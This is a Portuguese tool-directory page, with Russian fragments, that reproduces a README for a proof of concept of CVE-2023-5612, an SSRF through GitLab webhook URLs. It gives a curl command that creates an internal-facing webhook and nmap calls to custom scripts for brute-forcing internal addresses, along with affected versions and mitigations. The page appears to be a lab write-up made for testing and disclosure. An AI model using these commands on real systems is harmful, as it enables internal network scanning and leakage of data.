Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Review.CVE-2023-5612 — Análise via script CVE-2023-5612 | Kitploit
Ferramentas/GitHubGitHub/topskiypavelqwertygang/review.cve-2023-5612
ReconhecimentoMapeamento de RedeAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubtopskiypavelqwertygang/review.cve-2023-5612

Review.CVE-2023-5612

Análise via script CVE-2023-5612

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 1 anoAinda não revisado

CVE-2023-5612 – SSRF no GitLab via URL de Webhook (PoC e Análise)

📌 Visão Geral da CVE

  • ID da CVE: CVE-2023-5612
  • Severidade: Alta (CVSS: 8.1 Pontuação Base)
  • Tipo: Server-Side Request Forgery (SSRF)
  • Componente: Webhooks do GitLab CE/EE
  • Versões Afetadas: GitLab CE/EE < 16.2.7, 16.3 < 16.3.4, 16.4 < 16.4.1

🧠 Descrição

Uma vulnerabilidade SSRF no GitLab CE/EE permite que atacantes com acesso de Maintainer válido ao Projeto enviem requisições maliciosas para serviços internos arbitrários através de URLs de webhook maliciosas. A exploração leva a varredura de rede interna, vazamento de metadados ou pivoteamento adicional.


✅ Condições de Exploração

  • O atacante possui acesso maintainer ao projeto
  • O GitLab não possui filtragem rigorosa ou validação de URLs de webhook

⚙️ Passos do PoC (Manual)

root@kitploit:~
curl -s --header "PRIVATE-TOKEN: <TOKEN>" \
     --data-urlencode "url=http://127.0.0.1:8888" \
     http://<gitlab-host>:8080/api/v4/projects/<project_id>/hooks

🧱 Ambiente e Configuração

root@kitploit:~
- Kali Linux внутри виртуальной машины, развернутой специально под тестирование
- Поднятый через Docker экземпляр уязвимого GitLab CE (порт 8080)
- Внутри GitLab:
- Создан тестовый проект
- Сгенерирован Personal Access Token (glpat-...) с правами Maintainer
- Для внутреннего SSRF-таргета был поднят минимальный HTTP-сервис на 127.0.0.1:8888

🧠 Metodologia

root@kitploit:~
- Подтверждение уязвимости вручную через curl (см. PoC)
- Создание кастомных NSE-скриптов:
gitlab-ssrf.nse: точечная проверка SSRF
gitlab-ssrf-brute.nse: автоматический перебор внутренних адресов
- Тестирование с nmap -d и --script-trace, для анализа поведения API и фиксации результатов
- Получение отклика 401 Unauthorized от внутреннего сервиса, что указывает на успешный SSRF
- Успешный запрос вернет `201 Created` либо ошибку вида `401 Unauthorized`, что указывает на SSRF-доступ.

🛠 Script NSE (Acionamento Manual)

root@kitploit:~
nmap -p 8080 \
  --script ./gitlab-ssrf.nse \
  --script-args gitlab.token="<TOKEN>" \
  <target-ip>

🧪 Script NSE (Força Bruta de URLs Internas)

root@kitploit:~
nmap -p 8080 \
  --script ./gitlab-ssrf-brute.nse \
  --script-args gitlab.token="<TOKEN>" \
  <target-ip>

📈 Conclusão

root@kitploit:~
В ходе работы над уязвимостью **CVE-2023-5612** был воспроизведён успешный SSRF-атакующий сценарий с доступом к внутренним адресам через API GitLab CE. Это демонстрирует, насколько важно ограничивать возможности вебхуков и внедрять валидацию URL-адресов на стороне сервера.

🎯 Objetivo Alcançado:

  • SSRF confirmado
  • Ferramenta NSE implementada
  • Projeto documentado e aberto para a comunidade

📂 Estrutura do Repositório

root@kitploit:~
.
├── gitlab-ssrf.nse             # NSE script for manual SSRF verification
├── gitlab-ssrf-brute.nse       # NSE brute script to scan internal hosts/ports
├── screenshots/                # Скрины выполнения PoC и подтверждения уязвимости
└── README.md                   # Этот файл

🖼 Capturas de Tela

  • ✅ SSRF bem-sucedido com retorno 401 Unauthorized
  • 📜 Logs do nmap com execução do script
  • 📦 Adição de webhook via API

⚠️ Mitigação

  • Atualize o GitLab para >= 16.2.7 / 16.3.4 / 16.4.1
  • Limitar HTTP de saída através de firewall de egress
  • Usar listas de permissão internas para webhooks

🧠 Autor e Contato

Pavel Topskiy
GitHub • Analista de Segurança, Analista de Red Team


📅 Cronograma

  • Junho de 2025: Análise do PoC e da vulnerabilidade
  • 5 de junho de 2025: Escrita de script NSE personalizado e testes

🔐 Aviso Legal

Todos os testes foram realizados em ambientes de laboratório isolados, em versões intencionalmente vulneráveis. Não use isso contra sistemas não autorizados. Respeite os princípios de hacking ético.

Baixar ferramenta